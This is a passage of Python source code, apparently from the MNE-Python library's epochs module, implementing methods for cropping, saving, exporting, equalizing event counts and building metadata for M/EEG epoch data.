s += '(all good)' if self._bad_dropped else '(good & bad)'
s += ', %g - %g sec' % (self.tmin, self.tmax)
s += ', baseline '
if self.baseline is None:
s += 'off'
else:
s += f'{self.baseline[0]:g} – {self.baseline[1]:g} sec'
if self.baseline != _check_baseline(
self.baseline, times=self.times, sfreq=self.info['sfreq'],
on_baseline_outside_data='adjust'):
s += ' (baseline period was cropped after baseline correction)'
s += ', ~%s' % (sizeof_fmt(self._size),)
s += ', data%s loaded' % ('' if self.preload else ' not')
s += ', with metadata' if self.metadata is not None else ''
max_events = 10
counts = ['%r: %i' % (k, sum(self.events[:, 2] == v))
for k, v in list(self.event_id.items())[:max_events]]
if len(self.event_id) > 0:
s += ',' + '\n '.join([''] + counts)
if len(self.event_id) > max_events:
not_shown_events = len(self.event_id) - max_events
s += f"\n and {not_shown_events} more events ..."
class_name = self.__class__.__name__
class_name = 'Epochs' if class_name == 'BaseEpochs' else class_name
return '<%s | %s>' % (class_name, s)
def _repr_html_(self):
from .html_templates import repr_templates_env
if self.baseline is None:
baseline = 'off'
else:
baseline = tuple([f'{b:.3f}' for b in self.baseline])
baseline = f'{baseline[0]} – {baseline[1]} sec'
if isinstance(self.event_id, dict):
event_strings = []
for k, v in sorted(self.event_id.items()):
n_events = sum(self.events[:, 2] == v)
event_strings.append(f'{k}: {n_events}')
elif isinstance(self.event_id, list):
event_strings = []
for k in self.event_id:
n_events = sum(self.events[:, 2] == k)
event_strings.append(f'{k}: {n_events}')
elif isinstance(self.event_id, int):
n_events = len(self.events[:, 2])
event_strings = [f'{self.event_id}: {n_events}']
else:
event_strings = None
t = repr_templates_env.get_template('epochs.html.jinja')
t = t.render(epochs=self, baseline=baseline, events=event_strings)
return t
@verbose
def crop(self, tmin=None, tmax=None, include_tmax=True, verbose=None):
"""Crop a time interval from the epochs.
Parameters
----------
tmin : float | None
Start time of selection in seconds.
tmax : float | None
End time of selection in seconds.
%(include_tmax)s
%(verbose)s
Returns
-------
epochs : instance of Epochs
The cropped epochs object, modified in-place.
Notes
-----
%(notes_tmax_included_by_default)s
"""
# XXX this could be made to work on non-preloaded data...
_check_preload(self, 'Modifying data of epochs')
if tmin is None:
tmin = self.tmin
elif tmin < self.tmin:
warn('tmin is not in epochs time interval. tmin is set to '
'epochs.tmin')
tmin = self.tmin
if tmax is None:
tmax = self.tmax
elif tmax > self.tmax:
warn('tmax is not in epochs time interval. tmax is set to '
'epochs.tmax')
tmax = self.tmax
include_tmax = True
tmask = _time_mask(self.times, tmin, tmax, sfreq=self.info['sfreq'],
include_tmax=include_tmax)
self._set_times(self.times[tmask])
self._raw_times = self._raw_times[tmask]
self._data = self._data[:, :, tmask]
# Adjust rejection period
if self.reject_tmin is not None and self.reject_tmin < self.tmin:
logger.info(
f'reject_tmin is not in epochs time interval. '
f'Setting reject_tmin to epochs.tmin ({self.tmin} sec)')
self.reject_tmin = self.tmin
if self.reject_tmax is not None and self.reject_tmax > self.tmax:
logger.info(
f'reject_tmax is not in epochs time interval. '
f'Setting reject_tmax to epochs.tmax ({self.tmax} sec)')
self.reject_tmax = self.tmax
return self
def copy(self):
"""Return copy of Epochs instance.
Returns
-------
epochs : instance of Epochs
A copy of the object.
"""
return deepcopy(self)
def __deepcopy__(self, memodict):
"""Make a deepcopy."""
cls = self.__class__
result = cls.__new__(cls)
for k, v in self.__dict__.items():
# drop_log is immutable and _raw is private (and problematic to
# deepcopy)
if k in ('drop_log', '_raw', '_times_readonly'):
memodict[id(v)] = v
else:
v = deepcopy(v, memodict)
result.__dict__[k] = v
return result
@verbose
def save(self, fname, split_size='2GB', fmt='single', overwrite=False,
split_naming='neuromag', verbose=True):
"""Save epochs in a fif file.
Parameters
----------
fname : str
The name of the file, which should end with ``-epo.fif`` or
``-epo.fif.gz``.
split_size : str | int
Large raw files are automatically split into multiple pieces. This
parameter specifies the maximum size of each piece. If the
parameter is an integer, it specifies the size in Bytes. It is
also possible to pass a human-readable string, e.g., 100MB.
Note: Due to FIFF file limitations, the maximum split size is 2GB.
.. versionadded:: 0.10.0
fmt : str
Format to save data. Valid options are 'double' or
'single' for 64- or 32-bit float, or for 128- or
64-bit complex numbers respectively. Note: Data are processed with
double precision. Choosing single-precision, the saved data
will slightly differ due to the reduction in precision.
.. versionadded:: 0.17
%(overwrite)s
To overwrite original file (the same one that was loaded),
data must be preloaded upon reading. This defaults to True in 0.18
but will change to False in 0.19.
.. versionadded:: 0.18
%(split_naming)s
.. versionadded:: 0.24
%(verbose)s
Notes
-----
Bad epochs will be dropped before saving the epochs to disk.
"""
check_fname(fname, 'epochs', ('-epo.fif', '-epo.fif.gz',
'_epo.fif', '_epo.fif.gz'))
# check for file existence and expand `~` if present
fname = _check_fname(fname=fname, overwrite=overwrite)
split_size_bytes = _get_split_size(split_size)
_check_option('fmt', fmt, ['single', 'double'])
# to know the length accurately. The get_data() call would drop
# bad epochs anyway
self.drop_bad()
# total_size tracks sizes that get split
# over_size tracks overhead (tags, things that get written to each)
if len(self) == 0:
warn('Saving epochs with no data')
total_size = 0
else:
d = self[0].get_data()
# this should be guaranteed by subclasses
assert d.dtype in ('>f8', '<f8', '>c16', '<c16')
total_size = d.nbytes * len(self)
self._check_consistency()
over_size = 0
if fmt == "single":
total_size //= 2 # 64bit data converted to 32bit before writing.
over_size += 32 # FIF tags
# Account for all the other things we write, too
# 1. meas_id block plus main epochs block
over_size += 132
# 2. measurement info (likely slight overestimate, but okay)
over_size += object_size(self.info) + 16 * len(self.info)
# 3. events and event_id in its own block
total_size += self.events.size * 4
over_size += len(_event_id_string(self.event_id)) + 72
# 4. Metadata in a block of its own
if self.metadata is not None:
total_size += len(_prepare_write_metadata(self.metadata))
over_size += 56
# 5. first sample, last sample, baseline
over_size += 40 * (self.baseline is not None) + 40
# 6. drop log: gets written to each, with IGNORE for ones that are
# not part of it. So make a fake one with all having entries.
drop_size = len(json.dumps(self.drop_log)) + 16
drop_size += 8 * (len(self.selection) - 1) # worst case: all but one
over_size += drop_size
# 7. reject params
reject_params = _pack_reject_params(self)
if reject_params:
over_size += len(json.dumps(reject_params)) + 16
# 8. selection
total_size += self.selection.size * 4
over_size += 16
# 9. end of file tags
over_size += _NEXT_FILE_BUFFER
logger.debug(f' Overhead size: {str(over_size).rjust(15)}')
logger.debug(f' Splittable size: {str(total_size).rjust(15)}')
logger.debug(f' Split size: {str(split_size_bytes).rjust(15)}')
# need at least one per
n_epochs = len(self)
n_per = total_size // n_epochs if n_epochs else 0
min_size = n_per + over_size
if split_size_bytes < min_size:
raise ValueError(
f'The split size {split_size} is too small to safely write '
'the epochs contents, minimum split size is '
f'{sizeof_fmt(min_size)} ({min_size} bytes)')
# This is like max(int(ceil(total_size / split_size)), 1) but cleaner
n_parts = max(
(total_size - 1) // (split_size_bytes - over_size) + 1, 1)
assert n_parts >= 1, n_parts
if n_parts > 1:
logger.info(f'Splitting into {n_parts} parts')
if n_parts > 100: # This must be an error
raise ValueError(
f'Split size {split_size} would result in writing '
f'{n_parts} files')
if len(self.drop_log) > 100000:
warn(f'epochs.drop_log contains {len(self.drop_log)} entries '
f'which will incur up to a {sizeof_fmt(drop_size)} writing '
f'overhead (per split file), consider using '
f'epochs.reset_drop_log_selection() prior to writing')
epoch_idxs = np.array_split(np.arange(n_epochs), n_parts)
for part_idx, epoch_idx in enumerate(epoch_idxs):
this_epochs = self[epoch_idx] if n_parts > 1 else self
# avoid missing event_ids in splits
this_epochs.event_id = self.event_id
_save_split(this_epochs, fname, part_idx, n_parts, fmt,
split_naming, overwrite)
@verbose
def export(self, fname, fmt='auto', *, overwrite=False, verbose=None):
"""Export Epochs to external formats.
Supported formats: EEGLAB (set, uses :mod:`eeglabio`)
%(export_warning)s
Parameters
----------
%(export_params_fname)s
%(export_params_fmt)s
%(overwrite)s
.. versionadded:: 0.24.1
%(verbose)s
Notes
-----
.. versionadded:: 0.24
%(export_warning_note_epochs)s
%(export_eeglab_note)s
"""
from .export import export_epochs
export_epochs(fname, self, fmt, overwrite=overwrite, verbose=verbose)
def equalize_event_counts(self, event_ids=None, method='mintime'):
"""Equalize the number of trials in each condition.
It tries to make the remaining epochs occurring as close as possible in
time. This method works based on the idea that if there happened to be
some time-varying (like on the scale of minutes) noise characteristics
during a recording, they could be compensated for (to some extent) in
the equalization process. This method thus seeks to reduce any of
those effects by minimizing the differences in the times of the events
within a `~mne.Epochs` instance. For example, if one event type
occurred at time points ``[1, 2, 3, 4, 120, 121]`` and the another one
at ``[3.5, 4.5, 120.5, 121.5]``, this method would remove the events at
times ``[1, 2]`` for the first event type – and not the events at times
``[120, 121]``.
Parameters
----------
event_ids : None | list | dict
The event types to equalize.
If ``None`` (default), equalize the counts of **all** event types
present in the `~mne.Epochs` instance.
If a list, each element can either be a string (event name) or a
list of strings. In the case where one of the entries is a list of
strings, event types in that list will be grouped together before
equalizing trial counts across conditions.
If a dictionary, the keys are considered as the event names whose
counts to equalize, i.e., passing ``dict(A=1, B=2)`` will have the
same effect as passing ``['A', 'B']``. This is useful if you intend
to pass an ``event_id`` dictionary that was used when creating
`~mne.Epochs`.
In the case where partial matching is used (using ``/`` in
the event names), the event types will be matched according to the
provided tags, that is, processing works as if the ``event_ids``
matched by the provided tags had been supplied instead.
The ``event_ids`` must identify non-overlapping subsets of the
epochs.
method : str
If ``'truncate'``, events will be truncated from the end of each
type of events. If ``'mintime'``, timing differences between each
event type will be minimized.
Returns
-------
epochs : instance of Epochs
The modified instance. It is modified in-place.
indices : array of int
Indices from the original events list that were dropped.
Notes
-----
For example (if ``epochs.event_id`` was ``{'Left': 1, 'Right': 2,
'Nonspatial':3}``:
epochs.equalize_event_counts([['Left', 'Right'], 'Nonspatial'])
would equalize the number of trials in the ``'Nonspatial'`` condition
with the total number of trials in the ``'Left'`` and ``'Right'``
conditions combined.
If multiple indices are provided (e.g. ``'Left'`` and ``'Right'`` in
the example above), it is not guaranteed that after equalization the
conditions will contribute equally. E.g., it is possible to end up
with 70 ``'Nonspatial'`` epochs, 69 ``'Left'`` and 1 ``'Right'``.
.. versionchanged:: 0.23
Default to equalizing all events in the passed instance if no
event names were specified explicitly.
"""
from collections.abc import Iterable
_validate_type(event_ids, types=(Iterable, None),
item_name='event_ids', type_name='list-like or None')
if isinstance(event_ids, str):
raise TypeError(f'event_ids must be list-like or None, but '
f'received a string: {event_ids}')
if event_ids is None:
event_ids = list(self.event_id)
elif not event_ids:
raise ValueError('event_ids must have at least one element')
if not self._bad_dropped:
self.drop_bad()
# figure out how to equalize
eq_inds = list()
# deal with hierarchical tags
ids = self.event_id
orig_ids = list(event_ids)
tagging = False
if "/" in "".join(ids):
# make string inputs a list of length 1
event_ids = [[x] if isinstance(x, str) else x
for x in event_ids]
for ids_ in event_ids: # check if tagging is attempted
if any([id_ not in ids for id_ in ids_]):
tagging = True
# 1. treat everything that's not in event_id as a tag
# 2a. for tags, find all the event_ids matched by the tags
# 2b. for non-tag ids, just pass them directly
# 3. do this for every input
event_ids = [[k for k in ids
if all((tag in k.split("/")
for tag in id_))] # ids matching all tags
if all(id__ not in ids for id__ in id_)
else id_ # straight pass for non-tag inputs
for id_ in event_ids]
for ii, id_ in enumerate(event_ids):
if len(id_) == 0:
raise KeyError(f"{orig_ids[ii]} not found in the epoch "
"object's event_id.")
elif len({sub_id in ids for sub_id in id_}) != 1:
err = ("Don't mix hierarchical and regular event_ids"
" like in \'%s\'." % ", ".join(id_))
raise ValueError(err)
# raise for non-orthogonal tags
if tagging is True:
events_ = [set(self[x].events[:, 0]) for x in event_ids]
doubles = events_[0].intersection(events_[1])
if len(doubles):
raise ValueError("The two sets of epochs are "
"overlapping. Provide an "
"orthogonal selection.")
for eq in event_ids:
eq_inds.append(self._keys_to_idx(eq))
event_times = [self.events[e, 0] for e in eq_inds]
indices = _get_drop_indices(event_times, method)
# need to re-index indices
indices = np.concatenate([e[idx] for e, idx in zip(eq_inds, indices)])
self.drop(indices, reason='EQUALIZED_COUNT')
# actually remove the indices
return self, indices
@verbose
def to_data_frame(self, picks=None, index=None,
scalings=None, copy=True, long_format=False,
time_format='ms', *, verbose=None):
"""Export data in tabular structure as a pandas DataFrame.
Channels are converted to columns in the DataFrame. By default,
additional columns "time", "epoch" (epoch number), and "condition"
(epoch event description) are added, unless ``index`` is not ``None``
(in which case the columns specified in ``index`` will be used to form
the DataFrame's index instead).
Parameters
----------
%(picks_all)s
%(df_index_epo)s
Valid string values are 'time', 'epoch', and 'condition'.
Defaults to ``None``.
%(df_scalings)s
%(df_copy)s
%(df_longform_epo)s
%(df_time_format)s
.. versionadded:: 0.20
%(verbose)s
Returns
-------
%(df_return)s
"""
# check pandas once here, instead of in each private utils function
pd = _check_pandas_installed() # noqa
# arg checking
valid_index_args = ['time', 'epoch', 'condition']
valid_time_formats = ['ms', 'timedelta']
index = _check_pandas_index_arguments(index, valid_index_args)
time_format = _check_time_format(time_format, valid_time_formats)
# get data
picks = _picks_to_idx(self.info, picks, 'all', exclude=())
data = self.get_data()[:, picks, :]
times = self.times
n_epochs, n_picks, n_times = data.shape
data = np.hstack(data).T # (time*epochs) x signals
if copy:
data = data.copy()
data = _scale_dataframe_data(self, data, picks, scalings)
# prepare extra columns / multiindex
mindex = list()
times = np.tile(times, n_epochs)
times = _convert_times(self, times, time_format)
mindex.append(('time', times))
rev_event_id = {v: k for k, v in self.event_id.items()}
conditions = [rev_event_id[k] for k in self.events[:, 2]]
mindex.append(('condition', np.repeat(conditions, n_times)))
mindex.append(('epoch', np.repeat(self.selection, n_times)))
assert all(len(mdx) == len(mindex[0]) for mdx in mindex)
# build DataFrame
df = _build_data_frame(self, data, picks, long_format, mindex, index,
default_index=['condition', 'epoch', 'time'])
return df
def as_type(self, ch_type='grad', mode='fast'):
"""Compute virtual epochs using interpolated fields.
.. Warning:: Using virtual epochs to compute inverse can yield
unexpected results. The virtual channels have ``'_v'`` appended
at the end of the names to emphasize that the data contained in
them are interpolated.
Parameters
----------
ch_type : str
The destination channel type. It can be 'mag' or 'grad'.
mode : str
Either ``'accurate'`` or ``'fast'``, determines the quality of the
Legendre polynomial expansion used. ``'fast'`` should be sufficient
for most applications.
Returns
-------
epochs : instance of mne.EpochsArray
The transformed epochs object containing only virtual channels.
Notes
-----
This method returns a copy and does not modify the data it
operates on. It also returns an EpochsArray instance.
.. versionadded:: 0.20.0
"""
from .forward import _as_meg_type_inst
return _as_meg_type_inst(self, ch_type=ch_type, mode=mode)
def _drop_log_stats(drop_log, ignore=('IGNORED',)):
"""Compute drop log stats.
Parameters
----------
drop_log : list of list
Epoch drop log from Epochs.drop_log.
ignore : list
The drop reasons to ignore.
Returns
-------
perc : float
Total percentage of epochs dropped.
"""
if not isinstance(drop_log, tuple) or \
not all(isinstance(d, tuple) for d in drop_log) or \
not all(isinstance(s, str) for d in drop_log for s in d):
raise TypeError('drop_log must be a tuple of tuple of str')
perc = 100 * np.mean([len(d) > 0 for d in drop_log
if not any(r in ignore for r in d)])
return perc
def make_metadata(events, event_id, tmin, tmax, sfreq,
row_events=None, keep_first=None, keep_last=None):
"""Generate metadata from events for use with `mne.Epochs`.
This function mimics the epoching process (it constructs time windows
around time-locked "events of interest") and collates information about
any other events that occurred within those time windows. The information
is returned as a :class:`pandas.DataFrame` suitable for use as
`~mne.Epochs` metadata: one row per time-locked event, and columns
indicating presence/absence and latency of each ancillary event type.
The function will also return a new ``events`` array and ``event_id``
dictionary that correspond to the generated metadata.
Parameters
----------
events : array, shape (m, 3)
The :term:`events array <events>`. By default, the returned metadata
:class:`~pandas.DataFrame` will have as many rows as the events array.
To create rows for only a subset of events, pass the ``row_events``
parameter.
event_id : dict
A mapping from event names (keys) to event IDs (values). The event
names will be incorporated as columns of the returned metadata
:class:`~pandas.DataFrame`.
tmin, tmax : float
Start and end of the time interval for metadata generation in seconds,
relative to the time-locked event of the respective time window.
.. note::
If you are planning to attach the generated metadata to
`~mne.Epochs` and intend to include only events that fall inside
your epochs time interval, pass the same ``tmin`` and ``tmax``
values here as you use for your epochs.
sfreq : float
The sampling frequency of the data from which the events array was
extracted.
row_events : list of str | str | None
Event types around which to create the time windows / for which to
create **rows** in the returned metadata :class:`pandas.DataFrame`. If
provided, the string(s) must be keys of ``event_id``. If ``None``
(default), rows are created for **all** event types present in
``event_id``.
keep_first : str | list of str | None
Specify subsets of :term:`hierarchical event descriptors` (HEDs,
inspired by :footcite:`BigdelyShamloEtAl2013`) matching events of which
the **first occurrence** within each time window shall be stored in
addition to the original events.
.. note::
There is currently no way to retain **all** occurrences of a
repeated event. The ``keep_first`` parameter can be used to specify
subsets of HEDs, effectively creating a new event type that is the
union of all events types described by the matching HED pattern.
Only the very first event of this set will be kept.
For example, you might have two response events types,
``response/left`` and ``response/right``; and in trials with both
responses occurring, you want to keep only the first response. In this
case, you can pass ``keep_first='response'``. This will add two new
columns to the metadata: ``response``, indicating at what **time** the
event occurred, relative to the time-locked event; and
``first_response``, stating which **type** (``'left'`` or ``'right'``)
of event occurred.
To match specific subsets of HEDs describing different sets of events,
pass a list of these subsets, e.g.
``keep_first=['response', 'stimulus']``. If ``None`` (default), no
event aggregation will take place and no new columns will be created.
.. note::
By default, this function will always retain the first instance
of any event in each time window. For example, if a time window
contains two ``'response'`` events, the generated ``response``
column will automatically refer to the first of the two events. In
this specific case, it is therefore **not** necessary to make use of
the ``keep_first`` parameter – unless you need to differentiate
between two types of responses, like in the example above.
keep_last : list of str | None
Same as ``keep_first``, but for keeping only the **last** occurrence
of matching events. The column indicating the **type** of an event
``myevent`` will be named ``last_myevent``.
Returns
-------
metadata : pandas.DataFrame
Metadata for each row event, with the following columns:
- ``event_name``, with strings indicating the name of the time-locked
event ("row event") for that specific time window
- one column per event type in ``event_id``, with the same name; floats
indicating the latency of the event in seconds, relative to the
time-locked event
- if applicable, additional columns named after the ``keep_first`` and
``keep_last`` event types; floats indicating the latency of the
event in seconds, relative to the time-locked event
- if applicable, additional columns ``first_{event_type}`` and
``last_{event_type}`` for ``keep_first`` and ``keep_last`` event
types, respetively; the values will be strings indicating which event
types were matched by the provided HED patterns
events : array, shape (n, 3)
The events corresponding to the generated metadata, i.e. one
time-locked event per row.
event_id : dict
The event dictionary corresponding to the new events array. This will
be identical to the input dictionary unless ``row_events`` is supplied,
in which case it will only contain the events provided there.
Notes
-----
The time window used for metadata generation need not correspond to the
time window used to create the `~mne.Epochs`, to which the metadata will
be attached; it may well be much shorter or longer, or not overlap at all,
if desired. The can be useful, for example, to include events that occurred
before or after an epoch, e.g. during the inter-trial interval.
.. versionadded:: 0.23
References
----------
.. footbibliography::
"""
pd = _check_pandas_installed()
_validate_type(event_id, types=(dict,), item_name='event_id')
_validate_type(row_events, types=(None, str, list, tuple),
item_name='row_events')
_validate_type(keep_first, types=(None, str, list, tuple),
item_name='keep_first')
_validate_type(keep_last, types=(None, str, list, tuple),
item_name='keep_last')
if not event_id:
raise ValueError('event_id dictionary must contain at least one entry')
def _ensure_list(x):
if x is None:
return []
elif isinstance(x, str):
return [x]
else:
return list(x)
row_events = _ensure_list(row_events)
keep_first = _ensure_list(keep_first)
keep_last = _ensure_list(keep_last)
keep_first_and_last = set(keep_first) & set(keep_last)
if keep_first_and_last:
raise ValueError(f'The event names in keep_first and keep_last must '
f'be mutually exclusive. Specified in both: '
f'{", ".join(sorted(keep_first_and_last))}')
del keep_first_and_last
for param_name, values in dict(keep_first=keep_first,
keep_last=keep_last).items():
for first_last_event_name in values:
try:
match_event_names(event_id, [first_last_event_name])
except KeyError:
raise ValueError(
f'Event "{first_last_event_name}", specified in '
f'{param_name}, cannot be found in event_id dictionary')
event_name_diff = sorted(set(row_events) - set(event_id.keys()))
if event_name_diff:
raise ValueError(
f'Present in row_events, but missing from event_id: '
f'{", ".join(event_name_diff)}')
del event_name_diff
# First and last sample of each epoch, relative to the time-locked event
# This follows the approach taken in mne.Epochs
start_sample = int(round(tmin * sfreq))
stop_sample = int(round(tmax * sfreq)) + 1
# Make indexing easier
# We create the DataFrame before subsetting the events so we end up with
# indices corresponding to the original event indices. Not used for now,
# but might come in handy sometime later
events_df = pd.DataFrame(events, columns=('sample', 'prev_id', 'id'))
id_to_name_map = {v: k for k, v in event_id.items()}
# Only keep events that are of interest
events = events[np.in1d(events[:, 2], list(event_id.values()))]
events_df = events_df.loc[events_df['id'].isin(event_id.values()), :]
# Prepare & condition the metadata DataFrame
# Avoid column name duplications if the exact same event name appears in
# event_id.keys() and keep_first / keep_last simultaneously
keep_first_cols = [col for col in keep_first if col not in event_id]
keep_last_cols = [col for col in keep_last if col not in event_id]
first_cols = [f'first_{col}' for col in keep_first_cols]
last_cols = [f'last_{col}' for col in keep_last_cols]
columns = ['event_name',
*event_id.keys(),
*keep_first_cols,
*keep_last_cols,
*first_cols,
*last_cols]
data = np.empty((len(events_df), len(columns)))
metadata = pd.DataFrame(data=data, columns=columns, index=events_df.index)
# Event names
metadata.iloc[:, 0] = ''
# Event times
start_idx = 1
stop_idx = (start_idx + len(event_id.keys()) +
len(keep_first_cols + keep_last_cols))
metadata.iloc[:, start_idx:stop_idx] = np.nan
# keep_first and keep_last names
start_idx = stop_idx
metadata.iloc[:, start_idx:] = None
# We're all set, let's iterate over all eventns and fill in in the
# respective cells in the metadata. We will subset this to include only
# `row_events` later
for row_event in events_df.itertuples(name='RowEvent'):
row_idx = row_event.Index
metadata.loc[row_idx, 'event_name'] = \
id_to_name_map[row_event.id]
# Determine which events fall into the current epoch
window_start_sample = row_event.sample + start_sample
window_stop_sample = row_event.sample + stop_sample
events_in_window = events_df.loc[
(events_df['sample'] >= window_start_sample) &
(events_df['sample'] <= window_stop_sample), :]
assert not events_in_window.empty
# Store the metadata
for event in events_in_window.itertuples(name='Event'):
event_sample = event.sample - row_event.sample
event_time = event_sample / sfreq
event_time = 0 if np.isclose(event_time, 0) else event_time
event_name = id_to_name_map[event.id]
if not np.isnan(metadata.loc[row_idx, event_name]):
# Event already exists in current time window!
assert metadata.loc[row_idx, event_name] <= event_time
if event_name not in keep_last:
continue
metadata.loc[row_idx, event_name] = event_time
# Handle keep_first and keep_last event aggregation
for event_group_name in keep_first + keep_last:
if event_name not in match_event_names(
event_id, [event_group_name]
):
continue
if event_group_name in keep_first:
first_last_col = f'first_{event_group_name}'
else:
first_last_col = f'last_{event_group_name}'
old_time = metadata.loc[row_idx, event_group_name]
if not np.isnan(old_time):
if ((event_group_name in keep_first and
old_time <= event_time) or
(event_group_name in keep_last and
old_time >= event_time)):
continue
if event_group_name not in event_id:
# This is an HED. Strip redundant information from the
# event name
name = (event_name
.replace(event_group_name, '')
.replace('//', '/')
.strip('/'))
metadata.loc[row_idx, first_last_col] = name
del name
metadata.loc[row_idx, event_group_name] = event_time
# Only keep rows of interest
if row_events:
event_id_timelocked = {name: val for name, val in event_id.items()
if name in row_events}
events = events[np.in1d(events[:, 2],
list(event_id_timelocked.values()))]
metadata = metadata.loc[
metadata['event_name'].isin(event_id_timelocked)]
assert len(events) == len(metadata)
event_id = event_id_timelocked
return metadata, events, event_id
@fill_doc
class Epochs(BaseEpochs):
"""Epochs extracted from a Raw instance.
Parameters
----------
%(epochs_raw)s
%(events_epochs)s
%(event_id)s
%(epochs_tmin_tmax)s
%(baseline_epochs)s
Defaults to ``(None, 0)``, i.e. beginning of the the data until
time point zero.
%(picks_all)s
preload : bool
%(epochs_preload)s
%(reject_epochs)s
%(flat)s
%(proj_epochs)s
%(decim)s
%(epochs_reject_tmin_tmax)s
%(epochs_detrend)s
%(epochs_on_missing)s
%(reject_by_annotation_epochs)s
%(epochs_metadata)s
%(epochs_event_repeated)s
%(verbose)s
Attributes
----------
%(info_not_none)s
event_id : dict
Names of conditions corresponding to event_ids.
ch_names : list of string
List of channel names.
selection : array
List of indices of selected events (not dropped or ignored etc.). For
example, if the original event array had 4 events and the second event
has been dropped, this attribute would be np.array([0, 2, 3]).
preload : bool
Indicates whether epochs are in memory.
drop_log : tuple of tuple
A tuple of the same length as the event array used to initialize the
Epochs object. If the i-th original event is still part of the
selection, drop_log[i] will be an empty tuple; otherwise it will be
a tuple of the reasons the event is not longer in the selection, e.g.:
- 'IGNORED'
If it isn't part of the current subset defined by the user
- 'NO_DATA' or 'TOO_SHORT'
If epoch didn't contain enough data names of channels that exceeded
the amplitude threshold
- 'EQUALIZED_COUNTS'
See :meth:`~mne.Epochs.equalize_event_counts`
- 'USER'
For user-defined reasons (see :meth:`~mne.Epochs.drop`).
filename : str
The filename of the object.
times : ndarray
Time vector in seconds. Goes from ``tmin`` to ``tmax``. Time interval
between consecutive time samples is equal to the inverse of the
sampling frequency.
See Also
--------
mne.epochs.combine_event_ids
mne.Epochs.equalize_event_counts
Notes
-----
When accessing data, Epochs are detrended, baseline-corrected, and
decimated, then projectors are (optionally) applied.
For indexing and slicing using ``epochs[...]``, see
:meth:`mne.Epochs.__getitem__`.
All methods for iteration over objects (using :meth:`mne.Epochs.__iter__`,
:meth:`mne.Epochs.iter_evoked` or :meth:`mne.Epochs.next`) use the same
internal state.
If ``event_repeated`` is set to ``'merge'``, the coinciding events
(duplicates) will be merged into a single event_id and assigned a new
id_number as::
event_id['{event_id_1}/{event_id_2}/...'] = new_id_number
For example with the event_id ``{'aud': 1, 'vis': 2}`` and the events
``[[0, 0, 1], [0, 0, 2]]``, the "merge" behavior will update both event_id
and events to be: ``{'aud/vis': 3}`` and ``[[0, 0, 3]]`` respectively.
There is limited support for :class:`~mne.Annotations` in the
:class:`~mne.Epochs` class. Currently annotations that are present in the
:class:`~mne.io.Raw` object will be preserved in the resulting
:class:`~mne.Epochs` object, but:
1. It is not yet possible to add annotations
to the Epochs object programmatically (via code) or interactively
(through the plot window)
2. Concatenating :class:`~mne.Epochs` objects
that contain annotations is not supported, and any annotations will
be dropped when concatenating.
3. Annotations will be lost on save.
"""
@verbose
def __init__(self, raw, events, event_id=None, tmin=-0.2, tmax=0.5,
baseline=(None, 0), picks=None, preload=False, reject=None,
flat=None, proj=True, decim=1, reject_tmin=None,
reject_tmax=None, detrend=None, on_missing='raise',
reject_by_annotation=True, metadata=None,
event_repeated='error', verbose=None): # noqa: D102
if not isinstance(raw, BaseRaw):
raise ValueError('The first argument to `Epochs` must be an '
'instance of mne.io.BaseRaw')
info = deepcopy(raw.info)
# proj is on when applied in Raw
proj = proj or raw.proj
self.reject_by_annotation = reject_by_annotation
# keep track of original sfreq (needed for annotations)
raw_sfreq = raw.info['sfreq']
# call BaseEpochs constructor
super(Epochs, self).__init__(
info, None, events, event_id, tmin, tmax,
metadata=metadata, baseline=baseline, raw=raw, picks=picks,
reject=reject, flat=flat, decim=decim, reject_tmin=reject_tmin,
reject_tmax=reject_tmax, detrend=detrend,
proj=proj, on_missing=on_missing, preload_at_end=preload,
event_repeated=event_repeated, verbose=verbose,
raw_sfreq=raw_sfreq, annotations=raw.annotations)
@verbose
def _get_epoch_from_raw(self, idx, verbose=None):
"""Load one epoch from disk.
Returns
-------
data : array | str | None
If string, it's details on rejection reason.
If array, it's the data in the desired range (good segment)
If None, it means no data is available.
"""
if self._raw is None:
# This should never happen, as raw=None only if preload=True
raise ValueError('An error has occurred, no valid raw file found. '
'Please report this to the mne-python '
'developers.')
sfreq = self._raw.info['sfreq']
event_samp = self.events[idx, 0]
# Read a data segment from "start" to "stop" in samples
first_samp = self._raw.first_samp
start = int(round(event_samp + self._raw_times[0] * sfreq))
start -= first_samp
stop = start + len(self._raw_times)
# reject_tmin, and reject_tmax need to be converted to samples to
# check the reject_by_annotation boundaries: reject_start, reject_stop
reject_tmin = self.reject_tmin
if reject_tmin is None:
reject_tmin = self._raw_times[0]
reject_start = int(round(event_samp + reject_tmin * sfreq))
reject_start -= first_samp
reject_tmax = self.reject_tmax
if reject_tmax is None:
reject_tmax = self._raw_times[-1]
diff = int(round((self._raw_times[-1] - reject_tmax) * sfreq))
reject_stop = stop - diff
logger.debug(' Getting epoch for %d-%d' % (start, stop))
data = self._raw._check_bad_segment(start, stop, self.picks,
reject_start, reject_stop,
self.reject_by_annotation)
return data
@fill_doc
class EpochsArray(BaseEpochs):
"""Epochs object from numpy array.
Parameters
----------
data : array, shape (n_epochs, n_channels, n_times)
The channels' time series for each epoch. See notes for proper units of
measure.
%(info_not_none)s Consider using :func:`mne.create_info` to populate this
structure.
events : None | array of int, shape (n_events, 3)
The events typically returned by the read_events function.
If some events don't match the events of interest as specified
by event_id, they will be marked as 'IGNORED' in the drop log.
If None (default), all event values are set to 1 and event time-samples
are set to range(n_epochs).
tmin : float
Start time before event. If nothing provided, defaults to 0.
event_id : int | list of int | dict | None
The id of the event to consider. If dict,
the keys can later be used to access associated events. Example:
dict(auditory=1, visual=3). If int, a dict will be created with
the id as string. If a list, all events with the IDs specified
in the list are used. If None, all events will be used with
and a dict is created with string integer names corresponding
to the event id integers.
%(reject_epochs)s
%(flat)s
reject_tmin : scalar | None
Start of the time window used to reject epochs (with the default None,
the window will start with tmin).
reject_tmax : scalar | None
End of the time window used to reject epochs (with the default None,
the window will end with tmax).
%(baseline_epochs)s
Defaults to ``None``, i.e. no baseline correction.
proj : bool | 'delayed'
Apply SSP projection vectors. See :class:`mne.Epochs` for details.
on_missing : str
See :class:`mne.Epochs` docstring for details.
metadata : instance of pandas.DataFrame | None
See :class:`mne.Epochs` docstring for details.
.. versionadded:: 0.16
selection : ndarray | None
The selection compared to the original set of epochs.
Can be None to use ``np.arange(len(events))``.
.. versionadded:: 0.16
%(verbose)s
See Also
--------
create_info
EvokedArray
io.RawArray
Notes
-----
Proper units of measure:
* V: eeg, eog, seeg, dbs, emg, ecg, bio, ecog
* T: mag
* T/m: grad
* M: hbo, hbr
* Am: dipole
* AU: misc
EpochsArray does not set `Annotations`. If you would like to create
simulated data with Annotations that are then preserved in the Epochs
